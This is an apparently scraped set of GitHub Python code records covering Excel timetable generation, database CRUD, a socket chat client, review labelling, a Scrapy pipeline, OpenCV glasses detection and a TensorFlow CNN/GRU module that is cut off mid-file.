+{"seq_id":"20129185949","text":"#!/usr/bin/python3\n\nimport xlrd, xlwt\nfrom xlutils.copy import copy\nfrom createPattern import createPattern\n\nGROUP = \"ГРУППЫ_МОЭВМ.xls\"\nSUBJ_TABLE = \"groups\"\nLECT_TABLE = \"lections\"\nTT_PATTERN = \"timetablePattern.xls\"\n\ndef open_read_wrksht():\n rb = xlrd.open_workbook(GROUP,\n on_demand=True,\n formatting_info=True)\n return rb.sheet_by_index(0)\n\n\ndef get_data_from_groups_files():\n rb = open_read_wrksht() \n wb = createPattern(TT_PATTERN)\n wb_lection = createPattern(TT_PATTERN)\n for sem in range(0,2):\n worksheet = wb.get_sheet(sem) #change sem\n worksheet_lection = wb_lection.get_sheet(sem)\n r_row = 0\n w_lect_row = 1\n w_row = 1\n while r_row < 4:\n worksheet,worksheet_lection,w_row,w_lect_row = get_subj(worksheet,worksheet_lection, rb, w_row, w_lect_row,r_row, sem)\n w_row += 1\n r_row += 1\n create_border(worksheet, w_row) # write END for valid stopping\n create_border(worksheet_lection, w_lect_row) # of program\n wb.save(\"pract.xls\")\n wb_lection.save(\"lect.xls\")\n\n\ndef create_border(sheet, row):\n for col in range(0,5):\n sheet.write(row, col, \"END\")\n return\n\n\ndef get_read_sheet(rb, r_row):\n read_wb = xlrd.open_workbook(rb.cell(r_row,4).value,\n on_demand=True,\n formatting_info=True)\n course = str(int(rb.cell(r_row,0).value))\n print(\"course\", course)\n return read_wb.sheet_by_name(\"Курс\" + course), course\n\n\n\ndef get_subj(worksheet,worksheet_lection, rb,w_row,w_lect_row, r_row, sem):\n read_sheet, course = get_read_sheet(rb, r_row)\n if course == '1':\n border = 'Элективные курсы по физической культуре'\n 
start = 16\n elif course == '2':\n border = 'Элективные курсы по физической культуре'\n start = 28\n elif course == '3':\n border = 'Производственная практика'\n start = 45\n else:\n border = 'Военная подготовка (Обучение граждан по программе военной подготовки офицеров запаса на факультете военного обучения (военной кафедре))'\n start = 73\n for row in range(start, read_sheet.nrows):\n if read_sheet.cell(row,4).value == border:\n break\n if sem == 0:\n lab_col = 10\n flag = (read_sheet.cell(row, 6).value != '')\n else:\n lab_col = 20\n flag = (read_sheet.cell(row, 16).value != '')\n if str(read_sheet.cell(row,36).value) == \"14\" and flag:\n\n if read_sheet.cell(row,lab_col-1).value != '':\n worksheet_lection.write(w_lect_row, 0, course)\n worksheet_lection.write(w_lect_row, 1, \n read_sheet.cell(row,4).value)\n worksheet_lection.write(w_lect_row, 2, \n rb.cell(r_row,1).value)\n\n if read_sheet.cell(row,lab_col).value != '':\n worksheet.write(w_row, 0, course)\n worksheet.write(w_row, 1, \n read_sheet.cell(row,4).value)\n worksheet.write(w_row, 2, \n rb.cell(r_row,1).value)\n worksheet.write(w_row, 3, \"Лаб\")\n\n if read_sheet.cell(row,lab_col+1).value != '':\n w_row += 1\n worksheet.write(w_row, 0, course)\n worksheet.write(w_row, 1, \n read_sheet.cell(row,4).value)\n worksheet.write(w_row, 2, \n rb.cell(r_row,1).value)\n worksheet.write(w_row, 3, \"Пр\")\n w_row += 1\n w_lect_row += 1\n return worksheet,worksheet_lection,w_row, w_lect_row\n\n\n\nif __name__ == '__main__':\n get_data_from_groups_files()\n","repo_name":"PutkovDimi/moevm_automize_report","sub_path":"read_groups.py","file_name":"read_groups.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15390602862","text":"import connect\n\ndb = connect.koneksi()\n#menambahkan data baru ke dalam tabel pegawai\ndef add(data):\n cursor = db.cursor()\n sql = \"\"\"INSERT INTO pelanggan(nama_pelanggan,alamat_pelanggan,email_pelanggan)VALUES(%s,%s,%s)\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Data Pelanggan berhasil ditambah!'.format(cursor.rowcount))\n\n#menampilkan seluruh data dari tabel pegawai\ndef show():\n cursor=db.cursor()\n sql=\"\"\"SELECT*FROM pelanggan\"\"\"\n cursor.execute(sql)\n results = cursor.fetchall()\n print('---------------------------------------------------------')\n print(\"| ID | NAMA\\t\\t| ALAMAT\\t\\t| EMAIL PELANGGAN\\t\\t\")\n print('---------------------------------------------------------')\n for data in results:\n print(\"|\",data[0],\" |\",data[1],\"\\t\\t|\",data[2],\"\\t\\t\\t\\t|\",data[3],\"\\t\\t|\")\n print('---------------------------------------------------------')\n\n#mengubah data per record berdasarkan id pada tabel pegawai\ndef edit(data):\n cursor = db.cursor()\n sql = \"\"\"UPDATE Pelanggan SET nama_pelanggan=%s,alamat_pelanggan=%s,email_pepelanggan=%s WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Data Pelanggan berhasil diubah!'.format(cursor.rowcount))\n\n#menghapus data dari tabel pegawai\ndef delete(data):\n cursor = db.cursor()\n sql=\"\"\"DELETE FROM pelanggan WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Pelanggan berhasil dipecat!'.format(cursor.rowcount))\n\n#mencari data dari tabel pegawai\ndef search(id_pelanggan):\n cursor = db.cursor()\n sql=\"\"\"SELECT*FROM pelanggan WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,id_pelanggan)\n results = cursor.fetchall()\n 
print(\"------------------------------------------------\")\n print(\"|ID|NAMA\\t\\t ALAMAT\\t\\t EMAIL PELANGGAN\\t\\t\")\n print(\"------------------------------------------------\")\n for data in results:\n print(\"|\",data[0],\"|\",data[1],\"\\t\\t\",data[2],\"\\t\\t\",data[3],\"\\t\\t|\")\n print('----------------------------------------')\n","repo_name":"YudhanJeffri/TokoBuah","sub_path":"function/pelanggan.py","file_name":"pelanggan.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"21652721251","text":"import socket\nimport time\nfrom _thread import start_new_thread\n\n#HOST = \"10.199.35.238\" # The server's hostname or IP address\nHOST = \"127.0.0.1\"\nPORT = 20001 # The port used by the server\nname = input(\"Enter a name: \\n\")\nrunning = True\n\n#uma thread que so busca as novas mensagens no chat\n#cada instancia possui um contador de controle para saber quais mensagens ja foram baixadas\ndef receiveMessagesThread():\n lastMessage = 0\n while(running):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n data = bytes(\"getMessages():\"+str(lastMessage), 'utf-8')\n s.sendall(data)\n data = s.recv(1024)\n receivedString = data.decode('utf-8')\n if(receivedString != \"empty\"):\n print(receivedString)\n lastMessage += 1\n s.close()\n time.sleep(1)\n\n#inicializa a thread auxliar que busca mensagens\nstart_new_thread(receiveMessagesThread, ())\n\n#loop principal que fica controlando o envio das mensagens de um cliente\nwhile(running):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n msg = input(\"Enter a message (type 'exit' to finish):\\n\")\n s.connect((HOST, PORT))\n if(msg == \"exit\"):\n print(\"\\nChat finished\\n\")\n running = False\n msg = name+\": left the chat\"\n dataSend = \"\\n\"+name+\":\\n\"+ msg\n data = bytes(dataSend , 'utf-8')\n s.sendall(data)\n data = s.recv(1024)\n s.close()\n receivedString = data.decode('utf-8')\n if(receivedString != \"empty\"):\n print(\"\\n\"+receivedString)\n time.sleep(1)\n\n","repo_name":"ricardohaas/pos-big-data-and-data-science","sub_path":"03-programacao-paralela-e-distribuida/19-echo-client.py","file_name":"19-echo-client.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17770230801","text":"import json\n\n\ndef method1(file_in, file_pos, file_neg, file_ukn):\n fi = open(file_in, mode='r', encoding='utf-8')\n fpos = open(file_pos, mode='w', encoding='utf-8')\n fneg = open(file_neg, mode='w', encoding='utf-8')\n fukn = open(file_ukn, mode='w', encoding='utf-8')\n pos_review = []\n neg_review = []\n ukn_review = []\n for review in json.load(fi):\n # cases satisfying all following conditions will be annotated as 1 (valuable)\n # 1. length of the review(body) > 5\n # 2. more than half of people vote for the review\n # 3. total number of people who vote > 10\n #\n # such cases will be annotated as -1 (need to be annotated manually)\n # 1. new reviews posted after 525 (based on previous analysis) with vote <= 10\n # 2. 
percentage of people who vote for the review <= 0.5 but > 0.4\n #\n # else cases will be annotated as 0 (not valuable)\n if len(review['review_body'].split()) > 5 and \\\n review['helpful_score'] > 0.5 and \\\n review['total_vote'] > 10:\n annotated_review = {\n \"label\": 1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n pos_review.append(annotated_review)\n elif (review['date_para'] > 525 and review['total_vote'] <= 10) or \\\n 0.4 < review['helpful_score'] <= 0.5:\n annotated_review = {\n \"label\": -1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n ukn_review.append(annotated_review)\n else:\n annotated_review = {\n \"label\": 0,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n neg_review.append(annotated_review)\n print('Pos num: ' + str(len(pos_review)))\n print('Neg num: ' + str(len(neg_review)))\n print('Unk num: ' + str(len(ukn_review)))\n fpos.write(\n json.dumps(\n pos_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fneg.write(\n json.dumps(\n neg_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fukn.write(\n json.dumps(\n ukn_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n\n\ndef method2(file_in, file_pos, file_neg):\n \"\"\"\n extract positive samples an negative samples from file_in, then write them into file_pos and file_neg\n reviews with total number of votes less then a or number of words less than b will be discarded;\n remaining reviews with helpful score >= c will be annotated as helpful (positive)\n remaining reviews with helpful_score <= d will be annotated as unhelpful (negative)\n a, b, c, d are parameters and are obtained from experiment\n :param file_in: path of the input file\n :param file_pos: path of the positive file\n :param file_neg: path of the negative file\n :return:\n \"\"\"\n fi = open(file_in, mode='r', encoding='utf-8')\n fpos = open(file_pos, mode='w', encoding='utf-8')\n fneg = open(file_neg, mode='w', encoding='utf-8')\n pos_review = []\n neg_review = []\n for review in json.load(fi):\n if review['total_vote'] >= 10 and len(review['review_body'].split()) >= 5:\n if review['helpful_score'] >= 0.65:\n annotated_review = {\n \"label\": 1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n pos_review.append(annotated_review)\n elif review['helpful_score'] <= 0.5:\n annotated_review = {\n \"label\": 0,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n neg_review.append(annotated_review)\n\n print('Pos num: ' + str(len(pos_review)))\n print('Neg num: ' + str(len(neg_review)))\n fpos.write(\n json.dumps(\n pos_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fneg.write(\n json.dumps(\n neg_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n\n\nif __name__ == 
'__main__':\n file_in = '../data/fortnite_review_full_sorted.json'\n file_pos = '../data/pos.json'\n file_neg = '../data/neg.json'\n file_ukn = '../data/ukn.json'\n method2(file_in, file_pos, file_neg)","repo_name":"WangYipeng0624/helpfulness_prediction","sub_path":"util/machine_annotate.py","file_name":"machine_annotate.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41535756576","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n#class HhParserPipeline(object):\n# def process_item(self, item, spider):\n# return item\n\nfrom datetime import *\n\nimport sqlite3\nimport os\n\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher\n\n\n#class GismeteoParserPipeline(object):\n# def process_item(self, item, spider):\n# return item\n\nclass SQLiteStorePipeline(object):\n filename = '../database/hh.db'\n\n def __init__(self):\n if not os.path.isdir('../database/'):\n os.mkdir('../database/')\n\n self.conn = None\n dispatcher.connect(self.initialize, signals.engine_started)\n dispatcher.connect(self.finalize, signals.engine_stopped)\n\n def process_item(self, item, spider):\n try:\n #date = datetime.now()\n #date = str(date)\n #date = date[:10]\n #item['DATE'] = date\n\n self.conn.execute('INSERT INTO db VALUES(?,?,?,?)',\n (\n item['COUNTRY'], item['INDUSTRY'], item['COMPANY'], item['COMPANY_URL']\n )\n )\n except:\n print('Failed to insert item')\n return item\n\n def initialize(self):\n if os.path.exists(self.filename):\n self.conn = sqlite3.connect(self.filename)\n else:\n self.conn = self.create_table(self.filename)\n\n def finalize(self):\n if self.conn is not None:\n self.conn.commit()\n self.conn.close()\n self.conn = None\n\n def create_table(self, filename):\n conn = sqlite3.connect(filename)\n conn.execute('CREATE TABLE IF NOT EXISTS db'\n '('\n 'country TEXT, industry TEXT, company TEXT, company_url TEXT'\n ')'\n )\n\n conn.commit()\n return conn","repo_name":"everthinq/hh_parser","sub_path":"hh_parser/hh_parser/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72044430005","text":"from .common.monitor import Monitor\nfrom .common.strategies_map import get_strategies\n\n\ndef get_monitors(print_info: bool) -> list[Monitor]:\n monitors: list[Monitor] = []\n\n for S in get_strategies().values():\n s = S(verbose=print_info)\n\n s.run()\n\n monitors.extend(s.monitors)\n\n return monitors\n","repo_name":"cloudstrife9999/pymonitors","sub_path":"pymonitors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70336934647","text":"a = \"s\"\nwhile a!= \"n\":\n n = int(input(\"Digite a quantidade de elementos do conjunto: \"))\n vet = []\n for i in range(n):\n vet.append(float(input(\"Digite os elementos do conjunto A:\")))\n print(vet)\n print(\"O tamanho do vetor é:\",len(vet))\n b = [0] * n\n for i in range(len(vet)):\n if i % 2 == 1:\n b[i] = vet[i]/2\n else:\n i + 1 % 2 == 0\n b[i] = vet[i] * 3\n print(\"B:\",b)\n print(\"Deseja relizar uma nova operação?(s/n)\")\n a = input()\nprint(\"fim do 
programa\")\n\n\n\n\n","repo_name":"markclz/prog1-exercicios","sub_path":"q6l4.py","file_name":"q6l4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3392444278","text":"import numpy as np\nimport cv2\nimport copy\nGLASSES_THRESHOLD = 3\nBLUE_CUT_GLASSES_THRESHOLD = 10\nBLUE_CUT_GLASSES_THRESHOLD2 = 5\nDIFF=False#背景との差分でマスウを生成するかどうか。するなら最初に背景を取るために動画を流し、被写体がいないタイミングでescを押す。\n#正面を向いた時、ブルーライトの検出率が悪くなるので、2つ目を検出した時の閾値を別に用意している。\nHAAR_FILE = \"haarcascade_frontalface_default.xml\"\nHAAR_FILE2 = \"haarcascade_eye_tree_eyeglasses.xml\"\nHAAR_FILE3= \"haarcascade_eye.xml\"\nHAAR_FILE4= \"haarcascade_lefteye_2splits.xml\"\nHAAR_FILE5= \"haarcascade_righteye_2splits.xml\"\ncascade = cv2.CascadeClassifier(HAAR_FILE)\neye_cascade = cv2.CascadeClassifier(HAAR_FILE2)\neye_cascade2 = cv2.CascadeClassifier(HAAR_FILE3)\neye_cascade3 = cv2.CascadeClassifier(HAAR_FILE4)\neye_cascade4 = cv2.CascadeClassifier(HAAR_FILE5)\ncapture = cv2.VideoCapture(0)\n\ndef main():\n\n ret, backframe = capture.read() # スコプを伸ばすためのの記述\n while (DIFF):#背景画像を取得するので、被写体や動く物体はカメラから見えない所に置いてEscキー押してください。\n ret, backframe = capture.read()\n cv2.imshow(\"satuei\",backframe)\n if cv2.waitKey(10) == 27:\n break\n #capture.release()\n cv2.destroyAllWindows()\n\n while (True):\n ret, frame = capture.read()\n processed,mask=prepareDetection(backframe,frame)\n frame=processed\n frame_m=copy.deepcopy(frame)\n frame_m[mask == 0] = [0, 0, 0]\n img_g = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n face = cascade.detectMultiScale(img_g)\n\n # めがね判定オーバーレイ表示用画像\n frame_over = np.zeros(frame.shape, dtype = np.uint8)\n\n for (x, y, w, h) in face:\n if DIFF:#置き換え\n img_g = cv2.cvtColor(frame_m, cv2.COLOR_BGR2GRAY)\n frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 1)\n img_eye_gray = img_g[y:y + h, x:x + w]\n img_eye = frame[y:y + h, x:x + w]\n img_upper_face=frame[y+int(h/4):y + int(h/2), x+int(w/11*2):x + int(w/11*9)]\n blue= detectBluelightCutGlasses(img_upper_face,frame,10,10)\n #print(blue)\n\n #以下cascade祭り\n eyes = eye_cascade.detectMultiScale(img_eye_gray)\n eyes2 = eye_cascade2.detectMultiScale(img_eye_gray)\n eyes3 = eye_cascade3.detectMultiScale(img_eye_gray)\n eyes4 = eye_cascade4.detectMultiScale(img_eye_gray)\n #それぞれの検出した目をeyesに集積\n if(len(eyes)>0 and len(eyes2)>0):\n eyes = np.vstack((eyes, eyes2))\n if (len(eyes) > 0 and len(eyes3) > 0):\n eyes = np.vstack((eyes, eyes3))\n if (len(eyes) > 0 and len(eyes4) > 0):\n eyes = np.vstack((eyes, eyes4))\n # 検出した目が2個以上なら\n if (len(eyes))>= 2:\n # 目の座標・右目距離・左目距離を計算\n eyePoints, rightEyeDistances, leftEyeDistances = getEyePointsAndDistances(eyes, (int(w/4), int(h/4)), (int(w*3/4), int(h/4)))\n # 左右の目に最も近い目を決定\n rightEyePos = eyePoints[rightEyeDistances.index(min(rightEyeDistances))]\n leftEyePos = eyePoints[leftEyeDistances.index(min(leftEyeDistances))]\n\n #\n if (0 <= rightEyePos[0] < w/2) and (0 <= rightEyePos[1] < h/2) and (w/2 <= leftEyePos[0] < w) and (0 <= leftEyePos[1] < h/2):\n # めがね検出\n if not detectGlasses(eyes,img_eye_gray,img_eye, rightEyePos, leftEyePos, img_eye):\n #cv2.putText(img_eye, \"GLASSES\", (0, h), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.circle(frame_over, (int(x + w/2), int(y + h/2)), int(0.35*(w+h)), (0, 255, 0), thickness = int(0.05*(w+h)), lineType = cv2.LINE_AA)\n else:\n #cv2.putText(img_eye, \"NOT GLASSES\", (0, h), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA)\n s = int(0.03 * (w + h))\n t = s * 2\n wh = 
int(w/2)\n hh = int(h/2)\n p = np.array([[x + s, y - s], [x + wh, y + hh - t], [x + w - s, y - s], [x + w + s, y + s], [x + wh + t, y + hh], [x + w + s, y + h - s], [x + w - s, y + h + s], [x + wh, y + hh + t], [x + s, y + h + s], [x - s, y + h - s], [x + wh - t, y + hh], [x - s, y + s]]).reshape(1, -1, 2)\n cv2.fillPoly(frame_over, p, (0, 0, 255))\n \n if blue>BLUE_CUT_GLASSES_THRESHOLD:#ブルーライトカット眼鏡検出1\n\n cv2.putText(img_upper_face, \"Bluelight Cut Glasses\", (0, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(img_eye, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n # めがね判定オーバーレイ表示用画像重ね合わせ\n frame = np.clip((frame + 0.9 * frame_over), 0, 255).astype(np.uint8)\n\n cv2.imshow('frame',frame)\n if cv2.waitKey(10) == 27:\n break\n\n capture.release()\n cv2.destroyAllWindows()\n\ndef prepareDetection(bgimg,img):\n if(img is not None):\n framemask=backgroundMask(bgimg,img)\n img_g = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_3 = cv2.adaptiveThreshold(img_g, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 155, 30)\n img_3_3 = cv2.cvtColor(img_3, cv2.COLOR_GRAY2BGR)\n img_3_3 = cv2.GaussianBlur(img_3_3, (11, 11), 12)\n img_diff = cv2.absdiff(img, img_3_3) # 差分計算\n\n # img_diff[np.where((img_diff == [255,255,255]).all(axis=2))] = [240/2,221/2,195/2]#色の塗りつぶし(色の変換)\n\n img = cv2.addWeighted(img, 0.95, img_diff, 0.05, 3) # 画像合成\n # img=cv2.add(img,img_diff)\n\n return img,framemask\ndef detectBluelightCutGlasses(img,img_face,s,v):#svはhsvのsv\n # 青い眼鏡、青い髪、青い入れ墨等は誤認識します。\n #青色の範囲をHSVで指定して収集(frame_mask)\n #全体に青みがかってる場合の調整値を求める\n img_face = cv2.cvtColor(img_face, cv2.COLOR_BGR2HSV)\n lower = np.array([75, s, v])\n upper = np.array([135, 100, 100])\n frame_mask2 = cv2.inRange(img_face, lower, upper)\n average2 = np.mean(frame_mask2)\n #調整ありきで目の周辺の青色取得\n img=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n lower = np.array([75, s+int(average2), v+int(average2)])\n upper = np.array([135, 100, 100])\n frame_mask = cv2.inRange(img, lower, upper)\n average = np.mean(frame_mask)\n\n\n cv2.imshow(\"bluelight\",frame_mask)#確認用\n return average\n\ndef getEyePointsAndDistances(eyes, rightEyePos, LeftEyePos):\n \"\"\"\n 目の座標・右目距離・左目距離を返す。\n\n eyes : 目の座標のタプル\n rightEyePos : 右目の座標\n LeftEyePos : 左目の座標\n\n return 目の座標・右目距離・左目距離(それぞれがリスト)\n \"\"\"\n points = []\n rightEyeDistances = []\n leftEyeDistances = []\n for (x, y, w, h) in eyes:\n point = (int(x + w / 2), int(y + h / 2))\n points.append(point)\n rightEyeDistances.append(getDistance2(point, rightEyePos))\n leftEyeDistances.append(getDistance2(point, LeftEyePos))\n return points, rightEyeDistances, leftEyeDistances\n\n\ndef getDistance2(p1, p2):\n \"\"\"\n 2点間の距離の2乗を計算する。\n\n p1, p2 : 点の座標のタプル (x, y)\n \"\"\"\n return ((p1[0] - p2[0]) ** 2) + ((p1[1] - p2[1]) ** 2)\n\n\ndef clip(x, min, max):\n \"\"\"\n xをmin以上max以下の値にする。\n \"\"\"\n if x <= min:\n return min\n if x >= max:\n return max\n return x\n\n\ndef detectGlasses(eyes,img,img_color, eye1Pos, eye2Pos, debugImg = None):\n \"\"\"\n めがねが存在するか判定する。\n\n img : 顔画像(グレースケール)\n eyeXPos : X個目の目の座標のタプル (x, y)\n debugImg : デバッグ情報を書く画像(省略可)\n\n return True / False\n \"\"\"\n img_hsv = cv2.cvtColor(img_color, cv2.COLOR_BGR2HSV)\n lower = np.array([-33/2, 0, 50])\n upper = np.array([64/2, 100, 100])\n frame_mask = cv2.inRange(img_hsv, lower, upper)\n frame_mask = cv2.GaussianBlur(frame_mask, (21, 21), 12)\n frame_mask=cv2.cvtColor(frame_mask,cv2.COLOR_GRAY2BGR)\n img_color=cv2.addWeighted(img_color,0.9,frame_mask,0.1,3)\n # 目の中心座標の計算\n eyeCenter = 
((eye1Pos[0] + eye2Pos[0]) / 2, (eye1Pos[1] + eye2Pos[1]) / 2)\n\n # 目のX方向の距離を計算\n eyeDistance = abs(eye1Pos[0] - eye2Pos[0])\n if eyeDistance < min(img.shape[0], img.shape[1]) / 20:\n eyeDistance = int(min(img.shape[0], img.shape[1]) / 20)\n\n # 画像のエッジを求める\n img_2 = cv2.Canny(img, 50, 250)\n\n for (ex, ey, ew, eh) in eyes:#目の辺りを黒塗りにして差をつける\n img_2 = cv2.rectangle(img_2, (ex, ey), (ex + ew, ey + eh), (0, 0, 0), cv2.FILLED)\n\n # 目の周辺を切り出し2\n x4 = clip(int(eyeCenter[0] + eyeDistance/7), 0, img.shape[1])\n x3 = clip(int(eyeCenter[0] - eyeDistance/7), 0, img.shape[1])\n y3 = clip(int(eyeCenter[1] - eyeDistance ), 0, img.shape[0])\n y4 = clip(int(eyeCenter[1] + eyeDistance ), 0, img.shape[0])\n #img_2 = cv2.rectangle(img_2, (int(img_2.shape[0]/10*4), 0), (int(img_2.shape[0]/10*6), img_2.shape[1]), (0, 0, 0), cv2.FILLED) # 鼻の線を��したい。\n img_2 = cv2.rectangle(img_2, (x3, y3), (x4, y4), (0, 0, 0), cv2.FILLED)\n\n cv2.imshow(\"img_2\", img_2)\n # 目の間周辺の画像を切り出し\n x2 = clip(int(eyeCenter[0] + eyeDistance), 0, img.shape[1])\n x1 = clip(int(eyeCenter[0] - eyeDistance), 0, img.shape[1])\n y1 = clip(int(eyeCenter[1] - eyeDistance / 2), 0, img.shape[0])\n y2 = clip(int(eyeCenter[1] + eyeDistance / 2), 0, img.shape[0])\n img_betweenEyes = img_2[y1:y2, x1:x2]\n img_betweenEyes_color = img_color[y1:y2, x1:x2]\n\n #ブルーライトカット眼鏡検出2\n blue = detectBluelightCutGlasses(img_betweenEyes_color,img_color, 10, 15)\n print(str(blue) + \"blue\")\n if blue > BLUE_CUT_GLASSES_THRESHOLD2:\n cv2.putText(img_color, \"Bluelight Cut Glasses\", (0, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2, cv2.LINE_AA)\n # 平均の明るさを計算\n average = np.mean(img_betweenEyes)\n print(average)\n\n # デバッグ用\n if debugImg is not None:\n img_2=cv2.cvtColor(img_2,cv2.COLOR_GRAY2BGR)\n debugImg=cv2.addWeighted(img_2,0.5,img_color,0.5,3)\n '''debugImg[:, :, 0] = img_2\n debugImg[:, :, 1] = img_2\n debugImg[:, :, 2] = img_2'''\n\n cv2.line(debugImg, eye1Pos, eye2Pos, (255, 0, 0), 2, cv2.LINE_AA)\n cv2.rectangle(debugImg, (x1, y1), (x2, y2), (255, 0, 0), 1)\n\n if average >= GLASSES_THRESHOLD:\n return True\n else:\n return False\n\ndef backgroundMask(bgimg,img):#マスクを作る\n img_diff = cv2.absdiff(bgimg, img)#背景との差分\n img_diff = cv2.GaussianBlur(img_diff, (51, 51), 12)#ノイズ除去\n img_diff=cv2.cvtColor(img_diff,cv2.COLOR_BGR2GRAY)\n et, img_diff = cv2.threshold(img_diff, 20, 255, cv2.THRESH_BINARY)#二値化\n kernel = np.ones((3, 3), dtype=np.uint8)\n for i in range(10):#黒い穴を埋める\n img_diff = cv2.dilate(img_diff, kernel) # 白が膨張\n img_diff = cv2.erode(img_diff, kernel) # 黒が膨張\n\n img_diff = cv2.morphologyEx(img_diff, cv2.MORPH_CLOSE, kernel) # モルフォロジー。第二で方式を選択。\n if DIFF:\n cv2.imshow(\"img_diff\",img_diff)\n return img_diff\n\nif __name__ == '__main__':\n main()","repo_name":"sachsen/glasses_detection","sub_path":"glasses_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33499064228","text":"import tensorflow as tf\nimport numpy as np\nfrom cnn_rnn.HyMultiNN import RecurrentNeuralNetwork, FCNN, CNN\nimport time\n\ndef stacking_CNN(x, arg_dict, keep_prob, name):\n '''\n stacking策略中CNN子学习器\n :param x: Tensor\n :param arg_dict: cnn和fc所需所有权重和偏置值散列表\n :param keep_prob: dropout参数\n :param name: 计算节点命名\n :return: 全连接层最后输出一个最优半径值\n '''\n cnn = CNN()\n #两个维度一样的卷积层,一个池化层,一个全连接层\n with tf.name_scope('conv_layer'):\n conv_1, training_1, extra_update_ops_1 = cnn.conv2d(x, arg_dict['wc1'], arg_dict['bc1'], strides=1, use_bn='no')\n 
conv_2, training_2, extra_update_ops_2 = cnn.conv2d(conv_1, arg_dict['wc2'], arg_dict['bc2'], strides=1, use_bn='no')\n pooling_2 = cnn.pooling(style=tf.nn.max_pool, x=conv_2, k= 2)\n with tf.name_scope('fc_layer'):\n fc1_input = tf.reshape(pooling_2, [-1, arg_dict['wd1'].get_shape().as_list()[0]])\n if (training_1 or training_2) == None:\n keep_prob = 0.8\n fcnn = FCNN(fc1_input, keep_prob)\n fc = fcnn.per_layer(arg_dict['wd1'], arg_dict['bd1'])\n out = fcnn.per_layer(arg_dict['wd2'], arg_dict['bd2'], param= fc, name= name)\n\n return out\n\ndef stacking_GRU(x, num_units, arg_dict, name):\n '''\n stacking策略中的RNN子学习器\n :param x: type= 'ndarray' / 'Tensor'\n :param num_units: lstm/gru隐层神经元数量\n :param arg_dict: 全连接层权重以及偏置量矩阵散列\n :param name: 计算节点命名\n :return: MULSTM模型最终输出\n '''\n with tf.name_scope('multi_LSTMorGRU'):\n # 生成RecurrentNeuralNetwork对象\n\n #一层一对一输出隐层状态的GRU/LSTM,一层多对一输出隐层状态的GRU/LSTM,\n # 衔接一层神经元结点为上一层一半的fc层,再衔接一层神经元数量为上一层一半的fc层\n recurrentnn = RecurrentNeuralNetwork(x, keep_prob=0.8)\n # 添加layer_num层LSTM结点组合\n # LSTM\n # cells = recurrentnn.multiLSTM(net_name='LSTM', num_unit=num_units, layer_num=2)\n # GRU\n cells = recurrentnn.multiLSTM(net_name='GRU', num_unit= num_units, layer_num= 2)\n # outputs.shape= [batch_size, max_time, hide_size]\n # 